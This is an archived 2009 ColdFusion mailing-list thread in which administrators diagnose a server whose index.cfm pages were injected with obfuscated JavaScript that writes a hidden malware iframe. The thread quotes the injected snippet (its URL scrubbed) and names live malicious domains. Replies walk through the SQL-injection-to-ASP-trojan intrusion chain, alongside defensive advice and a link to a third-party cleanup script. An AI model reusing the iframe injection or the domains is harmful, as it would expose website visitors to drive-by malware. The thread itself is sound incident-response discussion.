Technically, no. In this post I have an example of a procedure which would be venerable to all kinds of SQL injection attacks. http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me SQL injection is made possible when you don't differentiate between your SQL code and arbitrary parameters. ANY form of dynamic SQL can be susceptible to that. ~Brad - Original Message - From: "Matthew Allen" To: "cf-talk" Sent: Friday, April 10, 2009 12:10 PM Subject: Re: Question about hack > >>This is yet another example where CFQUERYPARAM would have prevented >>the attack. Every time someone says it's unnecessary, I'm going to >>point them to this thread. > > Is it safe to assume then that using stored procedure would have prevented > the attack? > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321506 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
> Is it safe to assume then that using stored procedure would have prevented > the attack? Yes, unless the stored procedure is using something like EXECUTE, EXEC, etc to build executable strings of SQL. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321505 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
To be more precise, would the code below prevent an injection attack? Store proc: ... @uid uniqueidentifier AS BEGIN SELECT ID,column1, column2..etc FROM tbltable WHERE UID = @uid END CF Code: EXEC usp_getSomeData @param = '#url.uid#' >>This is yet another example where CFQUERYPARAM would have prevented >>the attack. Every time someone says it's unnecessary, I'm going to >>point them to this thread. > >Is it safe to assume then that using stored procedure would have prevented the >attack? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321504 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
>This is yet another example where CFQUERYPARAM would have prevented >the attack. Every time someone says it's unnecessary, I'm going to >point them to this thread. Is it safe to assume then that using stored procedure would have prevented the attack? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321501 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> What happened to us was not actually caused by ColdFusion. We found that it > was a ColdFusion script we where running that was not secure. Of course. CF is just like any other app server - it will do exactly what you tell it to do. If you have CF programs that can write to the filesystem, they need to be secured to prevent them from writing to the filesystem in ways you don't want. > The attacker used a method called sql injection attack, which means he/she > queried > the server hundreds if not thousands of times data mining the database until > they got the site's admin/password. You can easily prevent this by using CFQUERYPARAM in all database queries for any data that comes from the client. > Hope this comes of use to some other people having this issue; I cannot > stress enough how important it is to escape sql strings before sending them > to a SQL server of any kind, and how important it is to rename files that > people upload when writing a script. (The most secure way is generally to do > two things, first you can verify images by using code to make sure the file > is actually an image [i'm sure you can find some free code to do so], and to > rename the image so it does not put an extension on the file, or make sure > the file ends in .jpg, .gif, exc... and make sure if you do not allow script > execution in the file you upload too.) In general, you should be very careful when allowing file uploads. You might rename files, you might place those files in a directory that blocks execution, you might place those files in a non-web-accessible directory. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321499 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
2009/4/10 ALL : > > I cannot stress enough how important it is to escape sql strings before > sending them > to a SQL server of any kind, This is yet another example where CFQUERYPARAM would have prevented the attack. Every time someone says it's unnecessary, I'm going to point them to this thread. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321497 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
After allot of looking into and investigating last night, we have found some more info on the subject. What happened to us was not actually caused by ColdFusion. We found that it was a ColdFusion script we where running that was not secure. The attacker used a method called sql injection attack, which means he/she queried the server hundreds if not thousands of times data mining the database until they got the site's admin/password. So, there was 1 security issue with the coldfusion script we where using. After he got the Admin/password they logged into the site's administration and uploaded a "gif" but it was not actually a "gif" rather it was an asp page that got executed on the server, because whoever wrote our CMS obviously didn't know how to code securely. (file name was logs.asp or log.aspx or a combo of the two) After he had a asp page on the server, he used that script to upload another asp page named "tops.aspx" which when I reviewed the code and did some research into found that the code was actually a well known trojan that was specifically designed to give "attackers" access to infect servers. Hope this comes of use to some other people having this issue; I cannot stress enough how important it is to escape sql strings before sending them to a SQL server of any kind, and how important it is to rename files that people upload when writing a script. (The most secure way is generally to do two things, first you can verify images by using code to make sure the file is actually an image [i'm sure you can find some free code to do so], and to rename the image so it does not put an extension on the file, or make sure the file ends in .jpg, .gif, exc... and make sure if you do not allow script execution in the file you upload too.) Hope this helps, -Nathan On Fri, Apr 10, 2009 at 7:53 AM, Mark Kruger wrote: > > Nathan, > > Can you answer a question for me. Does this attack affect "all cfm" pages > or > does it affect "index.*" pages? > > -Mark > > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message----- > From: Nathan Bruer [mailto:thegreat...@gmail.com] > Sent: Thursday, April 09, 2009 11:26 PM > To: cf-talk > Subject: Re: Question about hack > > > Ok, I wanted to post here because I have been looking around on google the > last few days because we had the same issue to give an update on to all the > findings we have found from our investigation... > > First off this IS an issue with either mssql/msaccess or ColdFusion or the > combination of the two. > > Whatever has been writing the script seems to be embedded in either one of > the coldfusion files somewhere or in the database you are executing from, > we > have not figured it out yet. > > This is what we have decided to do to solve the issue... > > Step 1: Shut down IIS. Whatever is causing this requires IIS to run from > what we have seen. > > Step 2: I have written a simple script in PHP (because that is what I > script > in) that will go through every file in the specified path and remove > anything that it finds matching the pattern in the 2.txt file. (default is > what was being written to our server). It will log all the files it changed > to alog.log file in the same directory. Here is what you need to do to run > the script... > > 1. Download: http://www.rallyinfo.com/fixer.zip > 2. Extract it somewhere on the server. > 3. Install PHP (if you don't already have it, REQ PHP5+ [I believe]) > 4. Open the 1.php file in the folder you extracted it too, and edit the > line that says "Path = 'D:/'" to whatever path you want to check for (i'd > suggest run it multiple times on every drive). > 5. Open a command line go to the folder that you extracted it to. > (example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", > then if it is on a different drive type the drive letter followed by a ":") > 6. type "php 1.php". Now wait, it may take hours depending on how many > files it has to read. > > This script will ONLY remove the infected files, it will NOT fix the issue. > We have not figured out what is causing the issue. I have a feeling, since > we are using access database to hold the info for ColdFusion, that there is > somewhere in the database it is executing from, however we have no proof > yet. Another theory is that it somehow implanted itself into one of the CF > files on whatever site had it infected first. And every time someone goes > to > that site it re-runs the script to infect a script to infect other files > with it. > > Step 3: Either uninstall ColdFu
RE: Question about hack
Nathan, Can you answer a question for me. Does this attack affect "all cfm" pages or does it affect "index.*" pages? -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Nathan Bruer [mailto:thegreat...@gmail.com] Sent: Thursday, April 09, 2009 11:26 PM To: cf-talk Subject: Re: Question about hack Ok, I wanted to post here because I have been looking around on google the last few days because we had the same issue to give an update on to all the findings we have found from our investigation... First off this IS an issue with either mssql/msaccess or ColdFusion or the combination of the two. Whatever has been writing the script seems to be embedded in either one of the coldfusion files somewhere or in the database you are executing from, we have not figured it out yet. This is what we have decided to do to solve the issue... Step 1: Shut down IIS. Whatever is causing this requires IIS to run from what we have seen. Step 2: I have written a simple script in PHP (because that is what I script in) that will go through every file in the specified path and remove anything that it finds matching the pattern in the 2.txt file. (default is what was being written to our server). It will log all the files it changed to alog.log file in the same directory. Here is what you need to do to run the script... 1. Download: http://www.rallyinfo.com/fixer.zip 2. Extract it somewhere on the server. 3. Install PHP (if you don't already have it, REQ PHP5+ [I believe]) 4. Open the 1.php file in the folder you extracted it too, and edit the line that says "Path = 'D:/'" to whatever path you want to check for (i'd suggest run it multiple times on every drive). 5. Open a command line go to the folder that you extracted it to. (example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", then if it is on a different drive type the drive letter followed by a ":") 6. type "php 1.php". Now wait, it may take hours depending on how many files it has to read. This script will ONLY remove the infected files, it will NOT fix the issue. We have not figured out what is causing the issue. I have a feeling, since we are using access database to hold the info for ColdFusion, that there is somewhere in the database it is executing from, however we have no proof yet. Another theory is that it somehow implanted itself into one of the CF files on whatever site had it infected first. And every time someone goes to that site it re-runs the script to infect a script to infect other files with it. Step 3: Either uninstall ColdFusion or turn it off so it will no longer be ran in IIS. We decided to uninstall ColdFusion because we only have about 2 sites that still use it, and we have decided to convert them into PHP. After that I cannot help much, seens how we didn't actually find the issue, but rather made it unable to run any longer. If you have any questions or comments I will actively watch this thread, and I will assist in (only though this thread) removing corrupted files. -Nathan Bruer ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321495 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Nathan, Thank you for contributing to this thread. It reminds me to add a bit of our research on this issue as well. A couple of posts which seem very on point are here: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ http://www.abuse.ch/?p=737 We don't think that this is limited to CF, but there may be a number of variation in play. Thanks again, Nick ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321494 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Ok, I wanted to post here because I have been looking around on google the last few days because we had the same issue to give an update on to all the findings we have found from our investigation... First off this IS an issue with either mssql/msaccess or ColdFusion or the combination of the two. Whatever has been writing the script seems to be embedded in either one of the coldfusion files somewhere or in the database you are executing from, we have not figured it out yet. This is what we have decided to do to solve the issue... Step 1: Shut down IIS. Whatever is causing this requires IIS to run from what we have seen. Step 2: I have written a simple script in PHP (because that is what I script in) that will go through every file in the specified path and remove anything that it finds matching the pattern in the 2.txt file. (default is what was being written to our server). It will log all the files it changed to alog.log file in the same directory. Here is what you need to do to run the script... 1. Download: http://www.rallyinfo.com/fixer.zip 2. Extract it somewhere on the server. 3. Install PHP (if you don't already have it, REQ PHP5+ [I believe]) 4. Open the 1.php file in the folder you extracted it too, and edit the line that says "Path = 'D:/'" to whatever path you want to check for (i'd suggest run it multiple times on every drive). 5. Open a command line go to the folder that you extracted it to. (example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", then if it is on a different drive type the drive letter followed by a ":") 6. type "php 1.php". Now wait, it may take hours depending on how many files it has to read. This script will ONLY remove the infected files, it will NOT fix the issue. We have not figured out what is causing the issue. I have a feeling, since we are using access database to hold the info for ColdFusion, that there is somewhere in the database it is executing from, however we have no proof yet. Another theory is that it somehow implanted itself into one of the CF files on whatever site had it infected first. And every time someone goes to that site it re-runs the script to infect a script to infect other files with it. Step 3: Either uninstall ColdFusion or turn it off so it will no longer be ran in IIS. We decided to uninstall ColdFusion because we only have about 2 sites that still use it, and we have decided to convert them into PHP. After that I cannot help much, seens how we didn't actually find the issue, but rather made it unable to run any longer. If you have any questions or comments I will actively watch this thread, and I will assist in (only though this thread) removing corrupted files. -Nathan Bruer ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321493 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
Ok, I wanted to post here because I have been looking around on google the last few days because we had the same issue to give an update on to all the findings we have found from our investigation... First off this IS an issue with either mssql/msaccess or ColdFusion or the combination of the two. Whatever has been writing the script seems to be embedded in either one of the coldfusion files somewhere or in the database you are executing from, we have not figured it out yet. This is what we have decided to do to solve the issue... Step 1: Shut down IIS. Whatever is causing this requires IIS to run from what we have seen. Step 2: I have written a simple script in PHP (because that is what I script in) that will go through every file in the specified path and remove anything that it finds matching the pattern in the 2.txt file. (default is what was being written to our server). It will log all the files it changed to alog.log file in the same directory. Here is what you need to do to run the script... 1. Download: http://www.rallyinfo.com/fixer.zip 2. Extract it somewhere on the server. 3. Install PHP (if you don't already have it, REQ PHP5+ [I believe]) 4. Open the 1.php file in the folder you extracted it too, and edit the line that says "Path = 'D:/'" to whatever path you want to check for (i'd suggest run it multiple times on every drive). 5. Open a command line go to the folder that you extracted it to. (example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", then if it is on a different drive type the drive letter followed by a ":") 6. type "php 1.php". Now wait, it may take hours depending on how many files it has to read. This script will ONLY remove the infected files, it will NOT fix the issue. We have not figured out what is causing the issue. I have a feeling, since we are using access database to hold the info for ColdFusion, that there is somewhere in the database it is executing from, however we have no proof yet. Another theory is that it somehow implanted itself into one of the CF files on whatever site had it infected first. And every time someone goes to that site it re-runs the script to infect a script to infect other files with it. Step 3: Either uninstall ColdFusion or turn it off so it will no longer be ran in IIS. We decided to uninstall ColdFusion because we only have about 2 sites that still use it, and we have decided to convert them into PHP. After that I cannot help much, seens how we didn't actually find the issue, but rather made it unable to run any longer. If you have any questions or comments I will actively watch this thread, and I will assist in (only though this thread) removing corrupted files. -Nathan Bruer ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321492 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
On Monday 06 Apr 2009, Dave Watts wrote: > > In that case, you can no longer trust the host, or it's > > host (if it's visualised). In the latter case, all other > > guests on the same box are also suspect. > I've not heard of a remote exploit that can climb out of a VM. It's trivial to do (look at Invisible Labs red pill / blue pill work for how it works on 'bare metal' hypervisors, and there was an exploit against VMWare the other year). If I was targeting ecommerce sites, I'd want to tick that box in my malware's toolkit. -- Helping to completely enable impactful end-to-end data as part of the IT team of the year, '09 and '08 Tom Chiverton Developer Tel: +44 0161 618 5032 Fax: +44 0161 618 5099 tom.chiver...@halliwells.com 3 Hardman Square, Manchester, M3 3EB www.Halliwells.com This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office together with a list of those non members who are referred to as partners. We use the word partner to refer to a member of the LLP, or an employee or consultant with equivalent standing and qualifications. Regulated by the Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.Halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321442 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> In that case, you can no longer trust the host, or it's > host (if it's visualised). In the latter case, all other > guests on the same box are also suspect. I've not heard of a remote exploit that can climb out of a VM. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321379 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> So, I guess one question is whether an XSS type > hack can result in code being added to a file on the > web server. No, not by itself. The WebDAV that Mosh mentioned, that's a likely culprit. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321378 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> Hi there. We've just seen a hack attempt that we > haven't seen before and I wanted to get feedback. > > The symptom is that some script code is inserted at > the bottom of certain pages (e.g. index.cfm). The > script (which has been scrubbed) looks like this: > > > The script downloads malware, which we obviously > want to prevent. We're trying to determine how it's > getting in their, whether through an old site with > inadequate code or the OS or something else. Any > thoughts? > > This is on a server running IIS 6 / CF7. My first thought is, if this script has actually been written to your .cfm files, this is a successful hack, not a hack attempt. My second thought is, why are these files writeable in the first place? In the vast majority of CF apps, neither the CF user account nor the IIS user account needs write permission to your CF files. Finally, I'm not aware of any specific worm that does this exact thing. Nor am I aware of any IIS issue that would allow this. My guess is that you have some CF application that allows writes to the filesystem; perhaps one of the CF sample apps? Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321377 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Nick: In addition to FTP, etc., check to see if you have WebDAV enabled on your server. It's an extension of HTTP that allows people to remotely author files on a website. A couple of years back, a client of mine had their site modified with WebDAV and, upon further review, every site on that server that had an index.cfm file had had that file modified to include the malicious code. HTH -- Mosh Teitelbaum evoch, LLC Tel: (301) 942-5378 Fax: (301) 933-3651 Email: mosh.teitelb...@evoch.com WWW: http://www.evoch.com/ > -Original Message- > From: Nick Gleason [mailto:n.glea...@citysoft.com] > Sent: Monday, April 06, 2009 2:19 PM > To: cf-talk > Subject: Question about hack > > > Hi there. We've just seen a hack attempt that we haven't seen before > and I > wanted to get feedback. > > The symptom is that some script code is inserted at the bottom of > certain > pages (e.g. index.cfm). The script (which has been scrubbed) looks > like > this: > <!-- >var applstrna0 = "<if"; >var applstrna1 = "rame src=<a rel="nofollow" href="http://said7"">http://said7"</a>;; >var applstrna2 = ".[BAD URL HERE]"; >var applstrna3 = " width=100 height=0></i"; >var applstrna4 = "frame>"; > document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); > //--> > > The script downloads malware, which we obviously want to prevent. > We're > trying to determine how it's getting in their, whether through an old > site > with inadequate code or the OS or something else. Any thoughts? > > This is on a server running IIS 6 / CF7. > > Thanks in advance, > > Nick > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321376 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
And if your CFML templates have been changed, it is possible that malware has been installed on the server itself (via cfexecute). In that case, you can no longer trust the host, or it's host (if it's visualised). In the latter case, all other guests on the same box are also suspect. Tom Chiverton Developer Tel: +44 0161 618 5032 Fax: +44 0161 618 5099 tom.chiver...@halliwells.com 3 Hardman Square, Manchester, M3 3EB www.Halliwells.com This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office together with a list of those non members who are referred to as partners. We use the word partner to refer to a member of the LLP, or an employee or consultant with equivalent standing and qualifications. Regulated by the Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.Halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321374 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Question about hack
Nick, it is *POSSIBLE* for your actual index.cfm files to be modified via SQL injection (xp_cmdshell on MS SQL Server), but it is highly doubtful. I can't think of a scenario where XSS could actually affect files on your server since that is a client-based attack. The XSS attack would need to be coupled with a server-side vulnerability. I would focus directly on all of your FTP access, Windows file sharing access, and telnet/remote desktop connections. If you using shared hosting, your problem just got a lot harder to track down. Also, for the record-- it is possible for an attacker to modify cfm files on your server if you have a piece of your application that allows users to upload files to the server (like images or attachments) and these files are placed in a web accessible location where they could be accessed via a URL and executed. (imagine uploading a .cfm file with a few cffile tags in it...) The probability of this sort of attack is smaller than the chances of someone brute-forcing your FTP login though. Like I said before, change ALL your passwords, and check your logs. If this is a publicly accessible server, it should be behind a firewall blocking ALL ports not absolutley necessary (like 80 and 443) ~Brad Original Message Subject: RE: Question about hack From: "Nick Gleason" Date: Mon, April 06, 2009 3:10 pm To: cf-talk Brad, Many thanks for your response. We'll take a look at those things. It appears that the code is in the actual index.cfm pages on the web server. There are some old sites on this server that may be vulnerable, so that is a theory. However, I would expect that kind of vulnerability to result in a database injection, which is not what we are seeing. So, I guess one question is whether an XSS type hack can result in code being added to a file on the web server. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321373 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
It's an iframe injection hack. It will insert a hidden frame into any
index.* page it finds.
Some urls entries inserted are 'ggleleadsense.biz/?click=*',
'mediahousenameshopfilm.cn/in.cgi?income29'
Change FTP passwords...
-Original Message-
From: Nick Gleason [mailto:n.glea...@citysoft.com]
Sent: Monday, April 06, 2009 4:28 PM
To: cf-talk
Subject: RE: Question about hack
William,
That's a great post - we're re-reading it now. However, this situation
seems to be code in the index.cfm page, not something being appended
from
the db. So, I'm not sure if that post will be relevant in this case.
Thoughts?
N
> -Original Message-
> From: William [mailto:will...@seiter.com]
> Sent: Monday, April 06, 2009 3:50 PM
> To: cf-talk
> Subject: RE: Question about hack
>
>
> Do a search on this list for 'exec('
> There was a big todo about this last summer. Probably in
> your database
>
>
>
> -Original Message-
> From: Nick Gleason
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk
> Subject: Question about hack
>
>
> Hi there. We've just seen a hack attempt that we haven't
> seen before and I wanted to get feedback.
>
> The symptom is that some script code is inserted at the
> bottom of certain pages (e.g. index.cfm). The script (which
> has been scrubbed) looks like
> this:
> <!--
>var applstrna0 = "<if";
>var applstrna1 = "rame src=<a rel="nofollow" href="http://said7"">http://said7"</a>;;
>var applstrna2 = ".[BAD URL HERE]";
>var applstrna3 = " width=100 height=0></i";
>var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+app
> lstrna4);
> //-->
>
> The script downloads malware, which we obviously want to
> prevent. We're trying to determine how it's getting in
> their, whether through an old site with inadequate code or
> the OS or something else. Any thoughts?
>
> This is on a server running IIS 6 / CF7.
>
> Thanks in advance,
>
> Nick
>
>
>
>
>
>
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;207172674;29440083;f
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321369
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
William,
That's a great post - we're re-reading it now. However, this situation
seems to be code in the index.cfm page, not something being appended from
the db. So, I'm not sure if that post will be relevant in this case.
Thoughts?
N
> -Original Message-
> From: William [mailto:will...@seiter.com]
> Sent: Monday, April 06, 2009 3:50 PM
> To: cf-talk
> Subject: RE: Question about hack
>
>
> Do a search on this list for 'exec('
> There was a big todo about this last summer. Probably in
> your database
>
>
>
> -Original Message-
> From: Nick Gleason
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk
> Subject: Question about hack
>
>
> Hi there. We've just seen a hack attempt that we haven't
> seen before and I wanted to get feedback.
>
> The symptom is that some script code is inserted at the
> bottom of certain pages (e.g. index.cfm). The script (which
> has been scrubbed) looks like
> this:
> <!--
>var applstrna0 = "<if";
>var applstrna1 = "rame src=<a rel="nofollow" href="http://said7"">http://said7"</a>;;
>var applstrna2 = ".[BAD URL HERE]";
>var applstrna3 = " width=100 height=0></i";
>var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+app
> lstrna4);
> //-->
>
> The script downloads malware, which we obviously want to
> prevent. We're trying to determine how it's getting in
> their, whether through an old site with inadequate code or
> the OS or something else. Any thoughts?
>
> This is on a server running IIS 6 / CF7.
>
> Thanks in advance,
>
> Nick
>
>
>
>
>
>
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;207172674;29440083;f
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321366
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Brad, Many thanks for your response. We'll take a look at those things. It appears that the code is in the actual index.cfm pages on the web server. There are some old sites on this server that may be vulnerable, so that is a theory. However, I would expect that kind of vulnerability to result in a database injection, which is not what we are seeing. So, I guess one question is whether an XSS type hack can result in code being added to a file on the web server. Thoughts? N > -Original Message- > From: b...@bradwood.com [mailto:b...@bradwood.com] > Sent: Monday, April 06, 2009 3:46 PM > To: cf-talk > Subject: RE: Question about hack > > > Is the malicious string in the actual index.cfm page on the > server, or is it being output on the page when CF processes > it as part of a variable from the form/url or database? > > If the actual files on your web server have been modified, > change all your FTP and remote admin passwords immediately > and run an antivirus scan. > Also, check your FTP logs, and date/time modified on the > files to determine when and how they were modified. Run an > extended find a replaced to clean your .cfm files. > > If the string is being appended into a url or form field and > then output on the page, htmleditformat or jsstringformat all > user-entered data and read up on XSS attacks. > > If the string has been appended into your database variables > and is being output on the page that way, look for un > paramaterized SQL statements, run a queryparam scanner, > change your SQL Server login passwords, and read up on SQL > injection attacks. Update your database to remove the > malicious values. > > ~Brad > > Original Message > Subject: Question about hack > From: "Nick Gleason" > Date: Mon, April 06, 2009 1:19 pm > To: cf-talk > > > Hi there. We've just seen a hack attempt that we haven't seen > before and I wanted to get feedback. > > The symptom is that some script code is inserted at the > bottom of certain pages (e.g. 